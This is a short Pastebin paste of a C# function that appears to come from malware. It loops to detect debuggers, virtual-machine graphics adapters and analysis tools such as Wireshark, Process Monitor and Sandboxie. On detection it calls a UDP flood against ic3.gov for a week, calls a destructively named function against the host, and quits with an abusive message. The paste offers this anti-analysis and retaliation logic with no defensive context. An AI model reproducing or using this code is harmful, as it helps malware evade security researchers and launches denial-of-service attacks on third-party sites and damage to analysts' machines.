Advertisement
Guest User

Untitled

a guest
Jun 25th, 2017
55
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.11 KB | None | 0 0
  1. public void Check()
  2. {
  3. bool fuck_you = false;
  4. while(true)
  5. {
  6. if(Debugger.IsAttached)
  7. {
  8. fuck_you = true;
  9. }
  10. string gd = Function.GetGraphicDevice();
  11. if(gd == "Parallels Video Adapter" || gd == "VMware SVGA II" || gd == "S3 Trio32/64" ||
  12. gd == "VirtualBox Graphics Adapter" || gd == "VM Additions S3 Trio32/64") {
  13. fuck_you = true;
  14. }
  15. foreach(Process P in Process.GetProcesses())
  16. {
  17. string name = P.MainWindowTitle.ToString().ToLower();
  18. if(name.Contains("wireshark") || name.Contains("network analyzer") ||
  19. name.Contains("netstat") || name.Contains("sandboxie") ||
  20. name.Contains("procmon") || name.Contains("filemon") ||
  21. name.Contains("regmon") || name.Contains("cain") ||
  22. name.Contains("netmon") || name.Contains("tcpview") ||
  23. name.Contains("process explorer")) { fuck_you = true; }
  24. }
  25. if(fuck_you)
  26. {
  27. Function.UdpFLood("ic3.gov", 60*60*24*7);
  28. Function.RapeBox();
  29. Function.Quit("Mother Fucker, trying to sniff me out, I'll show him...");
  30. }
  31. Thread.Sleep(5000);
  32. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement